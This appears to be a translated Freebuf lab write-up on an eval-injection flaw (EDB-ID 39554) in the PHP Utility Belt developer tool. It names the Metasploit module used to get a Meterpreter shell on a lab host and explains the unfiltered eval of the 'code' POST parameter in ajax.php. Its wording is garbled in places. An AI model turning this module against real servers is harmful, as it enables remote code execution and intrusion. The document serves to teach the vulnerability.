PHP Utility Belt is a set of tools for developers of PHP programs that can be used to test regular expressions and observe matches to Preg_match and Preg_match_all functions, observing the results of preg_replate functions ; obtain a random password containing two words, two digits, a capital letter and a symbol, serialization and deserialization, a date format for testing mktime and strtotime timestamps, or a numeric timestamp; run any PHP code outside the home page.
Because it can execute arbitrary PHP code, it can only be used in the test environment, must not be run in the product environment.
The vulnerability is edb-id:39554
Source code Download address is: Https://github.com/mboynes/php-utility-belt
Build an experimental environment where the IP address of the target drone is 192.168.248.129, the IP address of the attack aircraft is 192.168.248.128
For PHP Utility belt after the completion of the operation.
Metasploit has given a exploit code for this vulnerability, the path is
Exploit/multi/http/php_utility_belt_rce
Run this attack script on the aircraft
Then set payload
Next, set the appropriate options
Finally execute the exploit command and start the attack
The Meterpreter shell is visible, indicating that the attack was successful.
Grab the packet for the entire process, as follows
Where post passed the parameter named code, all the attack code in this variable, and then look at the vulnerability of the file ajax.php, the problem is in line 10th to 15th section of the code snippet
Visible program first determine whether the code parameter is set, if it has been set, directly into the Eval function, the function of the Eval function is to take the input parameters of the content as PHP code execution, and in the above code does not filter the user's incoming content, This means that the value given by the attacker in code will be unconditionally executed as long as the syntax specification of the PHP code is met, which is a typical eval injection.
The above code, if in the test environment, can facilitate the work of programmers, but placed in the product environment is very dangerous.
* Navyofficer delivery, reprint please specify from Freebuf hack and Geek (freebuf.com)